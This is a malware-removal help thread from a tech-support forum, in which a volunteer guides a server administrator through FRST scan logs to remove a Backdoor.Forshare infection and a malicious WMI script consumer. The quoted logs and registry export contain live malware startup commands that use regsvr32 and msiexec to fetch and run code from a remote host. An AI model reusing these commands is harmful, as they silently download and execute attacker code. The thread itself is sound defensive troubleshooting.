Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Unitrends Agent 7.4.0.0.20140415_64 bit (HKLM\...\{272473BB-94C1-44DB-9756-735156B3F457}) (Version: 7.4.0.0 - Unitrends)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers03: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-05-09] (Malwarebytes)
ContextMenuHandlers06: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-05-09] (Malwarebytes)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {15AEA90C-E874-464C-B770-32559451032E} - System32\Tasks\Microsoft\Windows\PLA\FCInternet Memory => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "FCInternet Memory" "$(Arg0)"
Task: {63EE8552-A444-4BA2-8E1E-C8350D6D412A} - System32\Tasks\Microsoft\Windows\Server Manager\ServerManager => C:\Windows\system32\ServerManagerLauncher.exe [2009-07-13] (Microsoft Corporation)
Task: {69110D7B-41DC-4E9D-BDD3-C826C7DB613B} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleUsageCollector => C:\Windows\system32\ceipdata.exe [2010-11-20] (Microsoft Corporation)
Task: {7613B79C-EE9E-4040-A965-C3C4F59B90EA} - System32\Tasks\FirstClass Directory Services Startup => F:\FCServer\FirstClassDS\fcds64.exe [2010-11-11] (Open Text Corporaton)
Task: {AFECE848-8DA2-461B-B5E6-CBEF57A4DF7D} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleCollector => C:\Windows\system32\ceiprole.exe [2010-11-20] (Microsoft Corporation)
Task: {D49A10DA-0F70-4779-BD96-B2D976A4F2E3} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerCeipAssistant => C:\Windows\system32\ceipdata.exe [2010-11-20] (Microsoft Corporation)
Task: {FEDBD1E2-4FD3-41FD-B82D-7D54819A92CB} - System32\Tasks\Microsoft\Windows\Backup\Microsoft-Windows-WindowsBackup => C:\Windows\System32\wbadmin.exe [2009-07-13] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer: <==== ATTENTION

==================== Loaded Modules (Whitelisted) ==============

2017-06-29 10:12 - 2017-05-25 14:11 - 02270664 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3112712058-1343828553-617848957-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-3112712058-1343828553-617848957-500\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 10.2.0.120 - 10.1.1.3
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll
MSCONFIG\startupreg: start1 => msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [ComPlusRemoteAdministration-DCOM-In] => (Allow) %systemroot%\system32\dllhost.exe
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC-EndPointMapper] => (Allow) %systemroot%\system32\scshost.exe
FirewallRules: [SCW-Allow-Inbound-Access-To-ScsHost-TCP-RPC] => (Allow) %systemroot%\system32\scshost.exe
FirewallRules: [DfsMgmt-In-TCP] => (Allow) %systemroot%\system32\dfsfrsHost.exe
FirewallRules: [{C1417264-7032-42D2-85FC-16C981C44460}] => (Allow) C:\PCBP\Exchange.dir\BpExch.exe
FirewallRules: [{F6CC17C6-C557-4A58-86D3-5DF2241E0B0A}] => (Allow) C:\PCBP\Exchange.dir\BpExch.exe
FirewallRules: [{C923A2C7-13D1-4391-B490-0D49FD0CD826}] => (Allow) C:\PCBP\Exchange.dir\bpbrick.exe
FirewallRules: [{9F3CE1AB-827D-4C9F-ACD9-2A3B2C16B282}] => (Allow) C:\PCBP\Exchange.dir\bpbrick.exe
FirewallRules: [{599E4CB8-B32D-4463-8CC0-8E8A2834718B}] => (Allow) C:\PCBP\Exchange.dir\cepservice.exe
FirewallRules: [{95F6187D-2A5F-491F-84BC-5366E50B8A8B}] => (Allow) C:\PCBP\Exchange.dir\cepservice.exe
FirewallRules: [{940DADD5-880E-49B1-B68C-333A5301B8DC}] => (Allow) C:\PCBP\Sql.dir\ssb.exe
FirewallRules: [{0CBC1B9C-D394-454B-8426-7B90D504D40F}] => (Allow) C:\PCBP\Sql.dir\ssb.exe
FirewallRules: [{58D9ADA2-C2CC-4C25-9030-E762D04E5C65}] => (Allow) C:\PCBP\WBPR.exe
FirewallRules: [{468DFAED-F897-4EE5-A6A8-10449C5DB9F9}] => (Allow) C:\PCBP\WBPR.exe
FirewallRules: [{A3FE234B-BC24-4584-8E3C-882736CB1658}] => (Allow) C:\PCBP\WBPS.exe
FirewallRules: [{C3A62DD6-FE12-437E-86E4-2BF11998843C}] => (Allow) C:\PCBP\WBPS.exe
FirewallRules: [{95BA7CA7-9249-440A-998E-539AB08CFC1D}] => (Allow) C:\PCBP\bpnetd.exe
FirewallRules: [{4727F406-33BB-4811-8594-324BBFC753BE}] => (Allow) C:\PCBP\bpnetd.exe
FirewallRules: [{3F53D5B9-24BC-476A-AFEA-42A2AF50853D}] => (Allow) C:\PCBP\putty.exe
FirewallRules: [{7338DFBC-1C2A-4E84-823B-D93BCF7C0B4B}] => (Allow) C:\PCBP\putty.exe
FirewallRules: [{E79A9B39-40AB-4370-9A40-B2318CF94F39}] => (Allow) LPort=810
FirewallRules: [WindowsServerBackup-wbengine-In-TCP-NoScope] => (Allow) %systemroot%\system32\wbengine.exe
FirewallRules: [{442BC63B-4959-4464-9532-0024F3615CB4}] => (Allow) LPort=25
FirewallRules: [{F1E7A4DA-874F-4D08-80DB-9BBEA52B984E}] => (Block) LPort=445

==================== Restore Points =========================

ATTENTION: System Restore is disabled
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (07/05/2017 10:17:16 AM) (Source: Software Protection Platform Service) (EventID: 1001) (User: )
Description: The Software Protection service failed to start. 0xC0020029
6.1.7601.17514

Error: (07/05/2017 07:41:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (07/05/2017 07:12:38 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (07/04/2017 08:49:41 AM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program 0621.exe because of this error.

Program: 0621.exe
File:

The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.

Additional Data
Error value: 3F201D5E
Disk type: 0

Error: (07/04/2017 08:49:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 0621.exe, version: 0.0.0.0, time stamp: 0x594abd4d
Faulting module name: 0621.exe, version: 0.0.0.0, time stamp: 0x594abd4d
Exception code: 0xc000001d
Fault offset: 0x0000000000011d5e
Faulting process id: 0xe10
Faulting application start time: 0x01d2f4cc6121847a
Faulting application path: C:\windows\debug\0621.exe
Faulting module path: C:\windows\debug\0621.exe
Report Id: a09bda50-60bf-11e7-a388-001517ba46c5

Error: (06/29/2017 11:49:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/29/2017 11:39:55 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (06/29/2017 10:08:39 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.

Error: (06/29/2017 10:08:39 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.

Error: (06/29/2017 10:08:01 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.


System errors:
=============
Error: (07/05/2017 11:19:26 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Win2PDF-A required for printer Win2PDF is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:25 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Win2PDF-A required for printer Win2Image is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:25 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver WebEx Document Loader required for printer WebEx Document Loader is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:24 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Send To Microsoft OneNote 2010 Driver required for printer Send To OneNote 2010 is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:24 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Send to Microsoft OneNote 16 Driver required for printer Send To OneNote 16 is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:23 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:23 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Microsoft Print To PDF required for printer Microsoft Print to PDF is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:20 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Canon iR-ADV 4245/4251 UFR II required for printer Canon iR-ADV 4245/4251 UFR II is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:19 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver KONICA MINOLTA 951 PCL required for printer KONICA MINOLTA 951 PCL is unknown. Contact the administrator to install the driver before you log in again.

Error: (07/05/2017 11:19:19 AM) (Source: UmrdpService) (EventID: 1111) (User: )
Description: Driver Foxit Reader PDF Printer Driver required for printer Foxit Reader PDF Printer is unknown. Contact the administrator to install the driver before you log in again.


==================== Memory info ===========================

Processor: Intel® Xeon® CPU E5520 @ 2.27GHz
Percentage of memory in use: 76%
Total physical RAM: 12225.82 MB
Available physical RAM: 2840.12 MB
Total Virtual: 24449.82 MB
Available Virtual: 13601.58 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:494.7 GB) (Free:467.46 GB) NTFS
Drive d: (LSVW-230) (CDROM) (Total:0.26 GB) (Free:0 GB) CDFS
Drive f: (FirstClass) (Fixed) (Total:1357.42 GB) (Free:1138.46 GB) NTFS
Drive g: (Mirror) (Fixed) (Total:930.99 GB) (Free:715.46 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1862 GB) (Disk ID: 199DFD70)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=494.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=1357.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931 GB) (Disk ID: 1EDCB6E4)
Partition 1: (Not Active) - (Size=931 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Attached Files


Edited by Oh My!, 13 July 2017 - 07:03 PM.


BC AdBot (Login to Remove)

 


#2 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,744 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:41 PM

Posted 11 July 2017 - 09:50 AM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

step1.gif In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> https://www.bleepingcomputer.com/logreply/650893 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

step2.gifIf you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new FRST log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download FRST by Farbar from the following link if you no longer have it available and save it to your destop.

    FRST Download Link

  • When you go to the above page, there will be 32-bit and 64-bit downloads available. Please click on the appropriate one for your version of Windows. If you are unsure as to whether your Windows is 32-bit or 64-bit, please see this tutorial.
  • Double click on the FRST icon and allow it to run.
  • Agree to the usage agreement and FRST will open. Do not make any changes and click on the Scan button.
  • Notepad will open with the results.
  • Post the new logs as explained in the prep guide.
  • Close the program window, and delete the program from your desktop.


As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#3 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,758 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:41 PM

Posted 13 July 2017 - 07:31 PM

Greetings tonybemidji and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. We don't ususally work on Servers but I will see what I can do.

I think you may have a malicious VBScript. Please follow the example here, focusing on the below information rather than the malicious information in the referenced post. It is probable the "bleep" in the below information is a replacement word for a swear word.

WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer: <==== ATTENTION

Please do this.

===================================================

SystemLook by jpshortstuff

--------------------
  • Please download SystemLook for either 64 bit or 32 bit systems and save it to your Desktop.
  • Right-click SystemLook.exe and select Run as administrator...
  • Copy the content of the following codebox into the main textfield:
:filefind
0621.exe
*Mysa1*
*Mysa2*
C:\Windows\system32\p
:regfind
0621.exe
*Mysa1*
*Mysa2*
*js.mykings.top*
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please copy and paste the report contents in your reply.
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • WMI results
  • SystemLook log

Edited by Oh My!, 13 July 2017 - 07:41 PM.
Added SystemLook

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#4 tonybemidji

tonybemidji
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:10:41 PM

Posted 14 July 2017 - 08:24 AM

Thanks for the reply...

 

The SystemLook log yielded three registry hits that I have cleaned up.  I deleted the referenced file a while ago.

 

The WMI tip was great... thank you.  I ran WBEMTest and deleted the script you identified.  SC-Cleaner found no hijacked shortcuts or registry items.

 

So time will tell if this fix is persistent.  I appreciate your help.  The SystemLook log follows:

 

 

SystemLook 30.07.11 by jpshortstuff
Log created at 07:19 on 14/07/2017 by FCAdmin
Administrator - Elevation successful
 
========== filefind ==========
 
Searching for "0621.exe"
No files found.
 
Searching for "*Mysa1*"
No files found.
 
Searching for "*Mysa2*"
No files found.
 
Searching for "C:\Windows\system32\p"
No files found.
 
========== regfind ==========
 
Searching for "0621.exe"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Windows\debug\0621.exe"="0621"
[HKEY_USERS\S-1-5-21-3112712058-1343828553-617848957-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Windows\debug\0621.exe"="0621"
[HKEY_USERS\S-1-5-21-3112712058-1343828553-617848957-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Windows\debug\0621.exe"="0621"
 
Searching for "*Mysa1*"
No data found.
 
Searching for "*Mysa2*"
No data found.
 
Searching for "*js.mykings.top*"
No data found.
 
-= EOF =-


#5 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,758 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:41 PM

Posted 14 July 2017 - 10:32 AM

Excellent.

I guess I should have asked you to provide the offending script so I could see it. Do you still have that information, by chance? No big deal if you don't have it.

Please do this for me.

===================================================

Exporting a Registry Key From the Run Box

--------------------
  • Press the Windows Key + R at the same time
  • Copy and paste the following into the Run box and press Enter

regedit /e "%userprofile%\desktop\look.txt" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg"

  • A look.txt document will be placed on your desktop
  • Copy and past the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Look.txt

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#6 tonybemidji

tonybemidji
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:10:41 PM

Posted 14 July 2017 - 10:45 AM

Thanks again...

 

How would I get the script?  This is uncharted territory for me.

 

Regarding the Registry entries...  I did disable these in MSConfig Startup.   I assume I can delete these registry entries:

 

 

Windows Registry Editor Version 5.00
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="start"
"hkey"="HKLM"
"command"="regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll"
"inimapping"="0"
"YEAR"=dword:000007e1
"MONTH"=dword:00000006
"DAY"=dword:0000001d
"HOUR"=dword:00000009
"MINUTE"=dword:00000000
"SECOND"=dword:00000027
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="start1"
"hkey"="HKLM"
"command"="msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q"
"inimapping"="0"
"YEAR"=dword:000007e1
"MONTH"=dword:00000006
"DAY"=dword:0000001d
"HOUR"=dword:00000009
"MINUTE"=dword:00000000
"SECOND"=dword:00000027


#7 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,758 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:41 PM

Posted 14 July 2017 - 11:12 AM

Greetings,

You would have had to copy the information that was deleted. I was just curious.

Not only can you delete those, you should. Those entries, along with c:\Windows\debug\item.dat indicate your computer was infected with the Backdoor.Forshare trojan.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#8 tonybemidji

tonybemidji
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:10:41 PM

Posted 17 July 2017 - 07:39 AM

Thanks for the analysis Gary.   Very, very helpful.   I completely missed the VBScript section in the FRST logs when I first ran them.  The link you provided was spot on and removing the script appears to have done the trick.  This system has gone the weekend without any of the symptoms reappearing.

 

I appreciate your time.

 

Tony



#9 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,758 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:41 PM

Posted 17 July 2017 - 09:07 AM

Hi Tony.

I am going to skip my normal follow up steps before closing the topic for 2 reasons. You are quite capable of managing the computer system yourself and because it is a Server I tend to do as little as possible so I don't inadvertently mess things up.

I will close the topic but feel free to send me a Personal Message if something pops up in the next day or two.

Gary
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#10 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,758 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:41 PM

Posted 17 July 2017 - 09:08 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users